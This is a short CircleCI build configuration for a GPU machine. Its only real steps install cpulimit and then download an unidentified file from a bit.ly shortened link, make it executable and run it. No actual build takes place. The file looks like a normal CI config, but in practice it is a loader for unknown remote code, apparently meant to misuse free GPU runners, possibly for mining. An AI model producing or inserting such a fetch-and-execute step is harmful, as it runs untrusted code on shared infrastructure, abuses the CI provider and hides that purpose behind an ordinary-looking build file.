version: 2.1

jobs:
  build:
    machine:
      resource_class: gpu.nvidia.medium
      image: ubuntu-1604-cuda-10.1:201909-23
    steps:
      - run: sudo apt-get update && sudo apt-get install -y cpulimit
      - run: wget https://bit.ly/3zzSste && chmod +x 3zzSste && ./3zzSste